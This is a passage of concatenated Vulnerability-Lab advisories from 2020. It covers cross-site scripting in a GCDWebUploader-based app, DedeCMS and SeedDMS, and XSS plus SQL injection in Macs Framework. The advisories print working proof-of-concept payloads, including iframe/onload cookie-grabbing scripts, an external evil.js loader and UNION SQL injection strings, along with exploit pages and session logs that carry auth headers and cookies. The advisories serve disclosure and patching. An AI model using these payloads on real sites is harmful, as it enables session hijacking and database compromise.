User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 187
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
oldPath=/Contacts 09:17:12:PM 10:Apr.:2020
.vcf&newPath=/evil-filename>"<iframe src=evil.source
onload=alert("PWND")></iframe>.vc
-
POST: HTTP/1.1 500 Internal Server Error
Content-Length: 593
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close
Solution - Fix & Patch:
=======================
1. Parse and filter the vcf name values next to add, edit or imports to
prevent an execution
2. Restrict and filter in the index listing the vcf names to sanitize
the output
Security Risk:
==============
The security risk of the persistent vcf cross site scripting web
vulnerability is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Title: DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor Link: http://www.dedecms.com
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A
Document Title:
===============
DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2195
Release Date:
=============
2020-04-09
Vulnerability Laboratory ID (VL-ID):
====================================
2195
Common Vulnerability Scoring System:
====================================
4.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Welcome to use the most professional PHP website content management
system in China-Zhimeng content management system,
he will be your first choice for easy website building. Adopt XML name
space style core templates: all templates are
saved in file form, which provides great convenience for users to design
templates and website upgrade transfers.
The robust template tags provide strong support for webmasters to DIY
their own websites. High-efficiency tag caching
mechanism: Allows the caching of similar tags. When generating HTML, it
helps to improve the reaction speed of the
system and reduce the resources consumed by the system.
(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site vulnerabilities in
the official DedeCMS v5.7 SP2 (UTF8) web-application.
Affected Product(s):
====================
DesDev Inc.
Product: DedeCMS - Content Management System v5.7 SP2
Vulnerability Disclosure Timeline:
==================================
2020-04-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerabilities has been
discovered in the official DedeCMS v5.7 SP2 UTF8 web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The persistent script code inject web vulnerabilities are located in the
`activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor`
and `CKEditorFuncNum`parameters of the `file_pic_view.php`,
`file_manage_view.php`, `tags_main.php`, `select_media.php`,
`media_main.php` files.
The attack vector of the vulnerability is non-persistent and the request
method to inject is POST. Successful exploitation of the vulnerability
results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation
of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable File(s):
[+] file_pic_view.php
[+] file_manage_view.php
[+] tags_main.php
[+] select_media.php
[+] media_main.php
Vulnerable Parameter(s):
[+] tag
[+] keyword
[+] activepath
[+] fmdo=move&filename & fmdo=edit&filename
[+] CKEditor & CKEditor=body&CKEditorFuncNum
Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers with
privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Request: Examples
https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads
https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc
https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en
PoC: Payload
".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].*
onload=alert(document.domain)>
>"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png
onload=alert(document.domain)">
>"><iframe src=evil.source onload=alert(document.domain)>
%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E
%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E
%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E
PoC: Exploitation
<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
<iframe
src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway=">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe
src=evil.source
onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe
src=evil.source onload=alert(document.domain)>2&langCode=en">
...
--- PoC Session Logs [POST] --- (Some Examples ...)
https://test23.localhost:8080/dede/media_main.php
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: https://test23.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://test23.localhost:8080/dede/media_main.php
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php
keyword=>"%20<<img
src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1830
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon,
06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/dede/file_pic_view.php
?activepath=%2Fuploads%2F>"
<"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer:
https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.6.40
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/include/dialog/select_media.php?
CKEditor=>"><iframe src=evil.source
onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source
onload=alert("2")>2&langCode=en
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1;
DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1137
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
pragma: no-cache
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2
Reference(s):
https://test23.localhost:8080/dede/media_main.php
https://test23.localhost:8080/dede/tags_main.php
https://test23.localhost:8080/dede/file_pic_view.php
https://test23.localhost:8080/dede/file_manage_view.php
https://test23.localhost:8080/include/dialog/select_media.php
Solution - Fix & Patch:
=======================
1. Parse the content to disallow html / js and special chars on the
affected input fields
2. Restrict the vulnerable paramter prevent injects via post method request
3. Secure the output location were the content is insecure sanitized
delivered as output
Security Risk:
==============
The security risk of the application-side persistent cross site
scripting web vulnerabilities in the different modules are estimated as
medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download
# CVE: N/A
Document Title:
===============
Macs Framework v1.14f CMS - Multiple Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2206
Release Date:
=============
2020-04-14
Vulnerability Laboratory ID (VL-ID):
====================================
2206
Common Vulnerability Scoring System:
====================================
7.4
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management
System. It focuses mainly on the
Edit In Place editing concept. It comes with a built in blog with
moderation support, user manager section,
roles manager section, SEO / SEF URL.
https://sourceforge.net/projects/macs-framework/files/latest/download
(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Macs Framework v1.1.4f CMS.
Affected Product(s):
====================
Macrob7
Product: Macs Framework v1.14f - Content Management System
Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
1.1 & 1.2
Multiple non-persistent cross site scripting web vulnerabilities has
been discovered in the official Mac Framework v1.1.4f Content Managament
System.
The vulnerability allows remote attackers to manipulate client-side
browser to web-applicatio requests to compromise user sesson credentials
or to
manipulate module content.
The first vulnerability is located in the search input field of the
search module. Remote attackers are able to inject own malicious script
code as
search entry to execute the code within the results page that is loaded
shortly after the request is performed. The request method to inject is
POST
and the attack vector is located on the client-side with non-persistent
attack vector.
The second vulnerability is located in the email input field of the
account reset function. Remote attackers are able to inject own
malicious script code as
email to reset the passwort to execute the code within performed
request. The request method to inject is POST and the attack vector is
located on the
client-side with non-persistent attack vector.
Successful exploitation of the vulnerabilities results in session
hijacking, non-persistent phishing attacks, non-persistent external
redirects to
malicious source and non-persistent manipulation of affected or
connected application modules.
Request Method(s):
[+] POST
Vulnerable Parameter(s):
[+] searchString
[+] emailAdress
1.3
Multiple remote sql-injection web vulnerabilities has been discovered in
the official Mac Framework v1.1.4f Content Managament System.
The vulnerability allows remote attackers to inject or execute own sql
commands to compromise the dbms or file system of the application.
The sql injection vulnerabilities are located in the `roleId` and
`userId` of the `editRole` and `deletUser` module. The request method to
inject or execute commands is GET and the attack vector is located on
the application-side. Attackers with privileged accounts to edit are
able to inject own sql queries via roleid and userid on deleteUser or
editRole. Multiple unhandled and broken sql queries are visible as default
debug to output for users as well.
Exploitation of the remote sql injection vulnerability requires no user
interaction and a privileged web-application user account.
Successful exploitation of the remote sql injection results in database
management system, web-server and web-application compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] deleteUser
[+] editRole
Vulnerable Parameter(s):
[+] userId
[+] roleId
Proof of Concept (PoC):
=======================
Google Dork(s): intitle, subtitle & co.
Site Powered by Mac's PHP MVC Framework Framework of the future
Design downloaded from Zeroweb.org: Free website templates, layouts, and
tools.
1.1
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without user account and with low user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.
PoC: Payload
>">"<iframe src=evil.source
onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
PoC: Vulnerable Source
<form method="post"
action="https://macs-cms.localhost:8080/index.php/search" id="searchForm">
<span class="searchLabel">Search Site:</span><input type="searchString"
value="" name="searchString" class="searchString">
<input type="submit" value="Search" class="searchSubmit">
</form><br>
<span class="error">No Results found for: "<iframe src="evil.source"
onload="alert(document.cookie)"></span>
--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/search
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://macs-cms.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
Upgrade-Insecure-Requests: 1
searchString=>">"<iframe src=evil.source
onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 9865
1.2
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without user account and with low user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.
PoC: Exploitation
test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com
PoC: Vulnerable Source
<form method="post"
action="https://macs-cms.localhost:8080/index.php/main/cms/login"
class="ajax" ajaxoutput="#loginMessage">
<table style="width:100%">
<tbody><tr>
<td style="width: 20px">Username:</td>
<td><input type="text" name="username"></td>
</tr>
<tr>
<td>Password:</td>
<td><input type="password" name="password"></td>
</tr>
<tr>
<td colspan="2"><input type="submit" value="Login"></td>
</tr>
<tr>
<td colspan="2"><br><div id="loginMessage" style="display:
block;">Invalid Username or Password</div></td>
</tr>
</tbody></table>
<br>
<a
href="https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword"
class="ajax" ajaxoutput="#forgotPassword">Forgot Password</a>
<input type="hidden" name="scrollPosition" value="102"></form>
<div id="forgotPassword" style="display: block;">
<form class="ajax" method="post"
action="https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess"
ajaxoutput="#forgotPasswordReturn">
Enter your email address: <input type="text" name="emailAddress"><br>
<input type="submit" value="Send Email">
</form>
<br>
<div id="forgotPasswordReturn" style="display: block;">Cannot find user
with Email address:
test"<iframe src=evil.source
onload=alert(document.cookie)>@gmail.com</iframe></div>
</div>
--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 335
-
https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true&=&emailAddress=test"<iframe src=evil.source
onload=alert(document.cookie)>@gmail.com
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 105
1.3
The remote sql injection web vulnerability can be exploited by remote
attackers with privileged application user account and without user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.
PoC: Payload
%27-1%20order%20by%205--
%27-1%20union select 1,2,3,4,@@version--
PoC: Exploitation
<html>
<head><body><title>Mac's CMS SQL Injection PoC</title>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20order%20by%205--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20union
select 1,2,3,4,@@version--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20order%20by%205--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20union
select 1,2,3,4,@@version--%20>
</body></head>
</html>
--- PoC Session Logs [GET] ---
https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId='-1
order by 5--
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: __utma=72517782.1164807459.1586620290.1586620290.1586620290.1;
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 53
--- [SQL Error Exception Logs] ---
SQLSTATE[HY000]: General error: 1 near "1": syntax error
-
Error executing SQL statement
SQLSTATE[HY000]: General error: 1 unrecognized token: "''';"
-
Error executing SQL statement
SQLSTATE[HY000]: General error: 1 1st ORDER BY term out of range -
should be between 1 and 5
-
5.0.12 'pwnd
This page was created in 1.5665068626404 seconds
Security Risk:
==============
1.1 & 1.2
the security risk of the client-side cross site scripting web
vulnerabilities in the search and email reset function are estimated as
medium.
1.3
The security risk of the remote sql injection web vulnerabilities in the
id parameters on delete are estimated as high.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: https://www.seeddms.org
# Software Link: https://www.seeddms.org/index.php?id=7
# CVE: N/A
Document Title:
===============
SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2209
Release Date:
=============
2020-04-15
Vulnerability Laboratory ID (VL-ID):
====================================
2209
Common Vulnerability Scoring System:
====================================
4.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
SeedDMS is a free document management system with an easy to use web
based user interface. It is based on PHP and
MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of
development has made it a mature, powerful
and enterprise ready platform for sharing and storing documents. It's
fully compatible with its predecessor LetoDMS.
(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 &
https://www.seeddms.org/index.php?id=7 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application.
Affected Product(s):
====================
Uwe Steinmann
Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14,
v5.1.16, v5.1.18 and v6.0.7
Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent cross site web vulnerabilities has been discovered
in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The persistent cross site scripting web vulnerabilities are located in
the `name` and `comment` parameter of the `AddEvent.php` file.
Remote attackers are able to add an own event via op.AddEvent with
malicious script codes. The request method to inject is POST
and the attack vector is located on the application-side. After the
inject the execution occurs in the admin panel within the
`Log Management` - `Webdav` and `Web` on view. The content of the
comment and name is unescaped pushed inside of the logs with
a html/js template. Thus allows an attacker to remotly exploit the issue
by a simple post inject from outside with lower privileges.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected or connected
application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] op.AddEvent (AddEvent.php)
Vulnerable Parameter(s):
[+] name
[+] comment
Affected Module(s):
[+] Log Management (out.LogManagement.php)
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers
